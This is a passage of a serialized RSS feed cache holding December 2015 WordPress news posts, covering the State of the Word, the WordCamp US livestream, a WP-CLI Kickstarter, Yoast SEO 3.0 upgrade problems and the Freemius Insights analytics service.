                                                                • NomadBase: A tool built by Human Made to allow for checking in and updating your location all over the world. It’s built with Mapbox and React to allow for a JavaScript frontend and the WordPress Backend.
                                                                • \n
                                                                • StoryCorps: StoryCorps uses the REST API as the connecting piece between a mobile app and the website, to allow people to create stories by interviewing their family, and uploading them through the app. I did a feature on this project earlier this year, and interviewed a member of the StoryCorps team.
                                                                • \n
                                                                \n

                                                                Matt looked back at a previous state of the word, where he anticipated WordPress could be better utilized as an app platform. Today, he notes that this is happening, and in many cases it is due to the WordPress REST API

                                                                \n

                                                                Calypso

                                                                \n

                                                                Matt spent some time discussing Calypso, which is the name of the project behind the new WordPress.com web interface and a native Mac App.

                                                                \n

                                                                Calypso is a single page application that’s built with JavaScript, using a Node.js web layer and React. You can find more on Calypso both on the post I wrote about the launch, as well as an interview I did with Matt about the project.

                                                                \n

                                                                Calypso is already having an impact on conversations happening about WordPress, and will likely be influential for years to come, especially as more PHP-first developers better learn a JavaScript-centric development approach. Dozens of Automattic employees learned JavaScript during the development of Calypso.

                                                                \n

                                                                JavaScript and APIs in WordPress’s future

                                                                \n

                                                                Matt said, “I believe that JavaScript and API-driven interfaces are the future.” While he doesn’t think PHP is going anywhere, and WordPress will always have many PHP components, he notes many of the benefits of JavaScript centric development.

                                                                \n

                                                                “There might be something on the other side that’s worth breaking backwards compatibility for,” Matt said in regard to how important he thinks enabling a faster JavaScript-driven experience is for WordPress.

                                                                \n

                                                                Matt spent some time discussing the importance of API driven development as a key to an open web.

                                                                \n

                                                                With the scaffolding layer of WordPress 4.4, themes and plugins can register their own endpoints and expose all sorts of data and functionality to external apps.

                                                                \n

                                                                Launches that affect WordPress

                                                                \n

                                                                A couple of cool projects have launched just this week that will affect WordPress.

                                                                \n

                                                                Going SSL with LetsEncrypt

                                                                \n

                                                                LetsEncrypt is a project that just launched that makes enabling SSL on the web free. With SSL certificates from LetsEncrypt, a significant burden has been lifted in the process for better securing the web.

                                                                \n

                                                                PHP 7

                                                                \n

                                                                PHP 7 just launched, and Matt calls it the most significant version of PHP that has shipped since the start of WordPress. PHP 7 is faster than any other PHP ever, and has better stability upon upgrade than pretty much any other version bump.

                                                                \n

                                                                Languages and WordPress

                                                                \n

                                                                Translations and various elements of multi-lingual support have been a trend for years in WordPress.

                                                                \n

                                                                Language packs were introduced to core in WordPress 3.7, and now language packs are available for all themes and plugins. Matt announced that the team behind Translate.WordPress.org is working to translate the top 100 plugins and themes in every available language.

                                                                \n

                                                                Customization

                                                                \n

                                                                WordPress’s first single page application was the Customizer. Matt believes the customization experience in WordPress will be incredibly important for improving the new user experience of WordPress.

                                                                \n

                                                                Homework: learn JavaScript

                                                                \n

                                                                Matt says he has homework for us: “Learn JavaScript, Deeply.” He says he’ll also follow his own advice, and learn JavaScript himself, which he’ll prove by committing code to WordPress that’s JavaScript based — by 4.7. He gives himself a healthy amount of time to learn, and it will be incredibly important for all WordPress developers to do.

                                                                \n

                                                                WordCamp 2016: December 2nd – 4th

                                                                \n

                                                                Matt closed by saying that Philadelphia will host the second WordCamp US as well, on December 2nd – 4th of 2016.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 05 Dec 2015 23:07:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: PHP7 and LetsEncrypt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45684\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/12/php7-and-letsencrypt/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:625:\"

                                                                LetsEncrypt is available as a beta so everyone can have free SSL, and PHP7 is released which will double the speed of many PHP apps, including WordPress. And it was the first day of WordCamp US, if you missed it definitely livestream tomorrow. (I’m doing the State of the Word at 5pm ET.) A pretty awesome day for the web.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 05 Dec 2015 04:53:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: Day One: A Live Streamer’s Perspective of WordCamp US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49310\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/day-one-a-live-streamers-perspective-of-wordcamp-us\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2361:\"

                                                                Day one of WordCamp US is complete. The event started streaming at 9AM Eastern and concluded at about 6:30PM. I was not able to attend the event in person so I spent the day watching the live stream. Although the site and streams suffered technical problems at the beginning of the event, they regained stability within an hour.

                                                                \n

                                                                The live streams are broken up into four different links and include captions below each video. For the most part, the captions are accurate but there were many times where they generated typographical errors. However, captions are better than no captions at all.

                                                                \n\"WordCampWordCamp US Live Stream\n

                                                                I found the audio quality excellent and I rarely encountered buffering issues. I heard a swear word at least twice over the live stream but it didn’t detract from my experience. A number of other viewers also recognized the stream’s stability.

                                                                \n

                                                                I have to echo Jeff\'s statement. Really good video and audio. For the most part, it was well done! @WordCampUS #wcus https://t.co/06uwSZGNNY

                                                                \n

                                                                — Jonathan Perlman (@jpurpleman) December 4, 2015

                                                                \n

                                                                \n

                                                                While I’m not able to experience WordCamp US in person, the live streams and the event’s hashtag on Twitter is the next best thing. Live streaming for day two starts at 9AM Eastern and there are still plenty of tickets available. Based on my experience today, I can confidently say the live streams are an excellent value. If you watched the live stream, tell us about your experience.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 05 Dec 2015 01:57:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: A More RESTful WP-CLI Kickstarter Campaign is Now 187% Funded\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49283\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/a-more-restful-wp-cli-kickstarter-campaign-is-now-187-funded\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2741:\"

                                                                \"restful-wp-cli\"

                                                                \n

                                                                Daniel Bachhuber, the current maintainer of WP-CLI, announced today that his Kickstarter campaign to develop a more RESTful WP-CLI is now complete. The original goal of $17,500 was fully funded within 12 hours of launching the campaign, pushing it onto the stretch goal where every additional $100 raised equals one hour of his time towards the WP REST API project in 2016.

                                                                \n

                                                                As Bachhuber is also a strong contributor on the WP REST API team, he is uniquely positioned to tackle the goal of this project – to get all WP REST API endpoints registered via plugins and themes to be automagically usable as WP-CLI commands.

                                                                \n

                                                                WP-CLI is one of the most indispensable tools for WordPress developers, so it’s not surprising that the campaign ended with 187% funding, $32,822 raised via 107 backers. Rewards for the higher tiers of support include consultation and education on advanced uses of WP-CLI and the WP REST API.

                                                                \n

                                                                Bachhuber announced the end of the campaign in a note published today, which concludes with questions he hopes to explore through his work in 2016.

                                                                \n

                                                                “Once you have the WP REST API, what is the single compelling reason to use WordPress?” he asked. “Or, why use WordPress at all? Gut reaction from creating my first React + WP app today: I don’t need WordPress. I just need the easiest way to create a powerful REST API.

                                                                \n

                                                                As the technology around WordPress continues to evolve, Bachhuber sees WordPress as the representation of a set of ideals.

                                                                \n

                                                                “I believe WordPress is the embodiment of core philosophies, rather than a specific manifestation of software: ownership over personal data, design for the users, commitment to backwards compatibility, etc.,” Bachhuber said.

                                                                \n

                                                                “To get to 100%, WordPress needs to interoperate with every part of the web.”

                                                                \n

                                                                Bachhuber will be working on the project during the first six months of 2016. He plans to post bi-weekly progress updates to the WP-CLI blog and will cross-post to Kickstarter as well.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 04 Dec 2015 02:58:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: WPWeekly Episode 215 – All About Logos With Andrew Bergeron\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=49295&preview_id=49295\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wptavern.com/wpweekly-episode-215-all-about-logos-with-andrew-bergeron\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2985:\"

                                                                In this episode, Marcus Couch and I are joined by Andrew Bergeron, founder of Visual Rhythm. Bergeron explains the effort and investment it takes to create memorable logos. He also shares tips on how to avoid designing forgettable logos. We also learn the history of the Nike Swoosh logo created by Carolyn Davidson in 1971.

                                                                \n

                                                                Stories Discussed:

                                                                \n

                                                                WordPress 4.4 RC1 Released
                                                                \nNearly Half of the WordPress Plugins in the Directory Are Not Updated After Two Years
                                                                \nFreemius Insights Enables Plugin Developers to Make Data-Driven Decisions
                                                                \nJoost de Valk on the Lessons Learned After Releasing WordPress SEO 3.0

                                                                \n

                                                                Plugins Picked By Marcus:

                                                                \n

                                                                Featured Image Reminder by Aaron Hockley from Vancouver, WA, displays a reminder if you press the Publish button and forget to assign a featured image to the post.

                                                                \n

                                                                Cart links for WooCommerce by Soft79 allows store managers to create urls that redirect a customer to a pre-populated cart. This is useful for email campaigns and call to action buttons.

                                                                \n

                                                                WaveSurfer-WP by Raymond Radet from France, replaces the default WordPress audio player with one that displays audio waveforms. It displays a mix of different audio channels for podcasts, radio, e-learning, and music or all channels simultaneously for audio tutorials, sound-packs, product demos, etc. which is its main purpose.

                                                                \n

                                                                WPWeekly Meta:

                                                                \n

                                                                Next Episode: Wednesday, December 9th 9:30 P.M. Eastern

                                                                \n

                                                                Subscribe To WPWeekly Via Itunes: Click here to subscribe

                                                                \n

                                                                Subscribe To WPWeekly Via RSS: Click here to subscribe

                                                                \n

                                                                Subscribe To WPWeekly Via Stitcher Radio: Click here to subscribe

                                                                \n

                                                                Listen To Episode #215:
                                                                \n

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 03 Dec 2015 23:25:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Matt: George Lakoff\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45642\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"http://ma.tt/2015/12/george-lakoff/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:583:\"

                                                                George Lakoff is an academic whose books I came across in my college years, and he’s been very influential on me, especially his approach to language through metaphors. He has an updated version of a classic book, Don’t Think of an Elephant, which is a great read if you’re interested in progressive politics. I noticed a link to a PDF to a WordPress-sounding address, and it turns out his entire site is on WordPress.com!

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 03 Dec 2015 03:11:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: Joost de Valk on the Lessons Learned After Releasing WordPress SEO 3.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49272\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"http://wptavern.com/joost-de-valk-on-the-lessons-learned-after-releasing-wordpress-seo-3-0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3844:\"

                                                                \"WordPressWithin the last few weeks, a number of readers have contacted us to look into the recent upgrade woes experienced by WordPress SEO users. Since 3.0’s release on November 18th, the development team has released six point releases.

                                                                \n

                                                                Joost de Valk, founder of Yoast.com, and lead developer of WordPress SEO, explains the mistakes made with the release and apologizes for the lack of communication, “We’ve made mistakes, obviously. Of course, there were bugs, which we have worked hard on and are still working on right now. We’ve made mistakes in communication too. We’re sorry about that,” he said.

                                                                \n

                                                                WordPress SEO is active on more than a million sites and the fallout from issues experienced by users upgrading to the 3.0 branch has resulted in many negative reviews. Over time, the plugin has gained a reputation of breaking with each upgrade.

                                                                \n

                                                                More Beta Testers Needed

                                                                \n

                                                                de Valk admits that when 3.0 was pushed out to the public, users would encounter bugs, but says it’s part of having a large variety of configurations across their install base, “There were a few bugs that I think we should’ve caught in our testing period which was extensive and we’re taking precautions to make sure we do next time,” he said.

                                                                \n

                                                                Despite the roadmap to Yoast SEO 3.0 published in November, the amount of people who tested the releases was small compared to every day users. The team is asking for ideas on how to encourage more people to participate in the beta testing process.

                                                                \n

                                                                Communication Breakdown

                                                                \n

                                                                de Valk and his team of five actively responded to users on Twitter and email but didn’t immediately address users on Facebook which led to harsh criticism. Paying customers were prioritized while free users were told that they wouldn’t be supported over email.

                                                                \n

                                                                de Valk admits it was probably the wrong course of action, “This was probably, in hindsight, not what we should’ve done. For future major releases we will try to actively support everybody for a period of time,” he said.

                                                                \n

                                                                It’s Difficult to Change a Reputation

                                                                \n

                                                                He also addresses the usability issues caused by changes to the user interface of the snippet editor, “We thought the interface was intuitive, we also thought people would watch that (30 second) video, but we were obviously wrong. We’re now thinking about how to improve the snippet editor so it’s more obvious how you are able to edit,” he said.

                                                                \n

                                                                The issues experienced by people upgrading WordPress SEO is a good example as to why automatically updating plugins is a bad idea. While the team continues to work hard to fix issues in the 3.0 branch, it’s going to take a number of excellent releases to erode the negative reputation that WordPress SEO upgrades will either break functionality or the site that’s using it.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 02 Dec 2015 23:29:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: Freemius Insights Enables Plugin Developers to Make Data-Driven Decisions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49239\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/freemius-insights-enables-plugin-developers-to-make-data-driven-decisions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10614:\"

                                                                The WordPress plugin directory gives authors a set of statistics but many are left wanting more. Freemius Insights, is a new service founded by Vova Feldman, that allows authors to accumulate detailed statistics from users.

                                                                \n

                                                                Feldman and his team of four, created the service after speaking to more than 100 plugin developers and realizing there’s a huge gap between what WordPress authors have in terms of data, compared to what web and mobile products have in the market.

                                                                \n

                                                                Up Front Opt-in

                                                                \n

                                                                According to the WordPress plugin directory guidelines, plugins are not allowed to phone home. That is, secretly send data without the user’s consent. Freemius Insights provides an opt-in form that displays immediately after activating a plugin. If a user skips this step, data won’t be sent to the author and the user is forwarded to the plugin’s settings screen.

                                                                \n\"FreemiusFreemius Insights Opt-in\n

                                                                The opt-in form is compatible with the plugin directory’s guidelines and is an easy way to be up front and honest with users that data is sent to a third-party.

                                                                \n

                                                                Data Collected by Freemius Insights

                                                                \n

                                                                If a user clicks the allow and continue button in the opt-in form, the following data is collected by Freemius Insights.

                                                                \n
                                                                  \n
                                                                • Active Sites
                                                                • \n
                                                                • Users
                                                                • \n
                                                                • How many users are connected to Freemius
                                                                • \n
                                                                • How many users deactivated the plugin
                                                                • \n
                                                                • How many users uninstalled the plugin
                                                                • \n
                                                                • Plugin versions
                                                                • \n
                                                                • WordPress versions
                                                                • \n
                                                                • PHP versions
                                                                • \n
                                                                • Reasons for uninstalling
                                                                • \n
                                                                • Top 10 languages
                                                                • \n
                                                                \n

                                                                Developers can use the Insights dashboard to see compiled data at a glance.

                                                                \n\"FreemiumFreemium Insights Stats Dashboard\n

                                                                This type of information helps developers make critical decisions such as what new features to work on, backwards compatibility, what translations to focus on, and more.

                                                                \n

                                                                See Which Sites Are Using Your Plugins

                                                                \n

                                                                In addition to these stats, developers can see which domains the plugin is activated on. Knowing the sites a plugin is activated on is valuable data. For example, if a plugin is used on Microsoft.com, the developer can leverage that information to possibly establish a one to one relationship. Developers can also create up sells to those specific sites.

                                                                \n\"SitesSites the Plugin is Activated On\n

                                                                Freemius Insights also uses this data to automatically send an email if a user uninstalls the plugin within the first hour after installation. The email template is personalized with the user’s name and site address. It asks for feedback on how the plugin can be improved or why it didn’t meet their needs.
                                                                \n

                                                                \n

                                                                Developers can even dive deep into a site’s activity and view recent events associated with their plugin such as updates, installs, activation, and who initiated the action. You can see the site’s language, PHP version, and a variety of other data.

                                                                \n\"DetailedDetailed Site View\n

                                                                If you want to know the names of the people who opted in, you can see that too. Since Freemius Insights collects a user’s email address, developers can interact with users on an individual level instead of broadcasting emails.

                                                                \n\"SeeSee Who Opted In\n

                                                                Receiving Feedback at a Critical Time

                                                                \n

                                                                One of the most annoying things plugin developers face are one star reviews with no explanation behind the review. Based on data collected during the beta testing process, Feldman discovered that more than 20% of the users who install a plugin will uninstall it within the first 15 minutes.

                                                                \n

                                                                Freemius Insights has a Deactivation Feedback Form. This form appears when a user deactivates the plugin and gives users an opportunity to explain why they deactivated it.

                                                                \n\"DeactivationDeactivation Form\n

                                                                This could be annoying if you’re deactivating a plugin to troubleshoot WordPress but Feldman explains why the form is tied to the deactivation procedure, “Once the user deactivates the plugin, the plugin can’t modify anything in the dashboard.

                                                                \n

                                                                The data is not sent until the plugin is deleted. If the user provides feedback, it’s stored locally in the database. When a user proceeds with the deletion process, it fires the uninstall hook and sends the data to the server,” he said.
                                                                \n

                                                                \n

                                                                Reasons Why Users Uninstall a Plugin

                                                                \n

                                                                In general, people give negative feedback more than positive. During the beta testing period, Freemius Insights witnessed more than a 82% conversion rate with the feedback form. This data is invaluable to developers and can be viewed on the Insights dashboard.

                                                                \n\"ReasonsReasons Why Users Deactivated The Plugin\n

                                                                Although Other is not helpful in this chart, it’s valuable because it represents how many users chose to provide custom feedback. It reinforces the fact that users are more than willing to tell developers what’s wrong if given the opportunity. Developers can also filter sites by Uninstalls to get a deeper understanding as to why a specific user uninstalled the plugin.

                                                                \n

                                                                Webhooks for Developers

                                                                \n

                                                                Freemius Insights has a webhooks mechanism built-in that enables developers to forward events to another location. For example, when a user installs a plugin, the developer can push the user’s email address into MailChimp. Another example is when a user upgrades a plugin, you can send them an email that lists new features in that version.

                                                                \n

                                                                Free and Paid Subscription Plans

                                                                \n

                                                                Freemius Insights has a free plan available to developers of free plugins. The free plan includes an unlimited amount of team members and captured users, but no email export. Paid plans start at $29.99 a month up to $299.99 a month depending on your install base.

                                                                \n\"FreemiumFreemium Insights Pricing Chart\n

                                                                If you’re interested in connecting your plugin to Freemius Insights, you’ll need to request a hands-on demo with the team. Feldman explains the benefits of a hands-on approach:

                                                                \n
                                                                  \n
                                                                • We want to be in control of our scale. Analytics requires a significant amount of storage and performance. If one of the most popular plugins joins the service without a heads up, it might drain our server’s resources and affect the performance of the rest of our users.
                                                                • \n
                                                                • FTUE (first-time user experience) is crucial for every service. Signing into an empty dashboard might make the wrong impression, and we know the first impression is critical. Therefore, we prefer to demo the platform by showing real data from our plugin.
                                                                • \n
                                                                • We believe the personal touch is more than a cliché. We are willing to spend time getting to know each developer we work with, building a personal relationship, and making sure every integration is a success story. We also love to learn new things, and user feedback is extremely valuable to us.
                                                                • \n
                                                                \n

                                                                Feldman says Insights is for plugin developers who want to make data driven decisions, “Freemius Insights provides ad-hoc data so developers don’t have to base decisions on gut instinct.”

                                                                \n

                                                                Out of Beta

                                                                \n

                                                                Freemius Insights is out of beta and today marks the first opportunity the public has to see Insights in action. I’ve only scratched the surface of what’s possible and how developers can leverage the data collected by the service. Again, if you’re interested in using Freemius Insights, schedule a demo with the team as spots will fill up quickly.

                                                                \n
